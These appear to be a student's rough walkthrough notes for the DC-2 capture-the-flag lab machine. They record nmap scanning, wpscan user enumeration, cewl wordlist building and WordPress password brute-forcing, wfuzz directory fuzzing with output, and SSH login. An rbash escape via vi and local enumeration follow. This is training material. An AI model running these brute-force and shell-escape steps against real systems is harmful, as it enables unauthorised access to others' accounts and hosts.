DC-2
nmap -sCV -p- -A --min-rate 10000 192.168.116.194
Add host entry in /etc/hosts
wpscan --url http://dc-2/ --enumerate p,u,t --plugins-detection aggressive
P - plugins
t- Themes
u-users
Enumerate the users using rockyou
wpscan --url http://dc-2/ -U users.txt -P /usr/share/wordlists/rockyou.txt
cewl http://dc-2/ >passwordlist.txt
wpscan --url http://dc-2/ -U users.txt -P passwordlist.txt
Note :creating new password list using cewl commad any specific use case for the websites use the below command
cewl http://dc-2/ >passwordlist.txt
/usr/bin/git
# cat proof.txt
0fa8d66033a87fd21c4bf2f7c8ba7eb3
Burpsuite - Exploit
Cat /etc/shells
How we can change the shell - permandently
Man chsh
https://drive.google.com/drive/u/1/folders/1RgES3dmF-5xvNU1dp--CJM-GAc1hN7Ro
Manual inspection
WordPress site - Use WPS scan
Note : Flag1 - Your usual wordlists probably wonโt work, so instead, maybe you just need to be cewl.
cewl http://dc-2/ >passwordlist.txt
Directory bursting
Wfuzz -c -z file,/opt/Seclists/Discovery/web-content/raft-large-files.txt --hc 404 IP
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.116.194:80/FUZZ/
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000020: 301 9 L 28 W 321 Ch "wp-admin"
000000013: 301 9 L 28 W 323 Ch "wp-content"
000000025: 301 9 L 28 W 324 Ch "wp-includes"
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 http://192.168.116.194:80/FUZZ
000000005: 405 0 L 6 W 42 Ch "xmlrpc.php"
000000001: 200 306 L 3902 W 53562 Ch "index.php"
000000036: 200 62 L 167 W 2165 Ch "wp-login.php"
000000130: 200 98 L 844 W 7413 Ch "readme.html"
000000206: 200 385 L 3179 W 19935 Ch "license.txt"
000000263: 200 0 L 0 W 0 Ch "wp-config.php"
000000297: 200 4 L 15 W 135 Ch "wp-trackback.php"
000000379: 301 0 L 0 W 0 Ch "."
000000377: 500 0 L 0 W 0 Ch "wp-settings.php"
000000413: 200 0 L 0 W 0 Ch "wp-cron.php"
000000399: 403 124 L 348 W 3444 Ch "wp-mail.php"
000000462: 200 10 L 21 W 215 Ch "wp-links-opml.php"
000000448: 200 0 L 0 W 0 Ch "wp-blog-header.php"
000000838: 200 0 L 0 W 0 Ch "wp-load.php"
000001073: 302 0 L 0 W 0 Ch "wp-signup.php"
000001507: 302 0 L 0 W 0 Ch "wp-activate.php"
WPSCAN - wp-admin
Default WordPress Credentials(admin/admin)
Authentication Bypass
SQL Injection
Brute Forcing - Hydra/wfuzz(password reuse/custom payload lists)
Error messages username enumeration -
WPS Scan
Wpscan --url http://dc-2/ --disable-tls-checks --enumerate p --enumerate t --enumerate u
wpscan --url http://dc-2/ --disable-tls-checks --enumerate p,t,u
We will create our own wordlist
Cewl siteaddress -m 5 -w $PWD/cewl.txt 2>/dev/null
cewl http://dc-2/ -m 5 -w $PWD/cewl.txt 2>/dev/null
Now bruteforce using wpscan
wpscan --url http://dc-2/ --disable-tls-checks -U users.txt -P cewl.txt
Now we do ssh
Ssh tom@$IP -p 7744
ssh [email protected] -p 7744
How are we going to resolve the -rbash clear command not found error
We will try pty shell - not working -
python -c 'import pty; pty.spawn("/bin/sh")'
Will try /bin/bash -I - not working
Bash -I not working
Clear command not working
We will use vi and set the variable
:set shell=/bin/bash and hit enter
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ ls /tom/usr/bin
ls: cannot access /tom/usr/bin: No such file or directory
tom@DC-2:~$ ls /home/tom/usr/bin
less ls scp vi
tom@DC-2:~$
Will get automatically exit from the vi and you will get the shell command working
now we will export TERM
python -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
Compilation capabilities
tom@DC-2:~$ which gcc
/usr/bin/gcc
tom@DC-2:~$ which cc
/usr/bin/cc
tom@DC-2:~$ which python
/usr/bin/python
tom@DC-2:~$ which perl
/usr/bin/perl
tom@DC-2:~$
Gcc? - yes
Cc? - yes
Python?- yes perl? - Yes
Uname -a
tom@DC-2:~$ uname -a
Linux DC-2 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux
tom@DC-2:~$ cat /etc/*-release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
tom@DC-2:~$
Last updated
Was this helpful?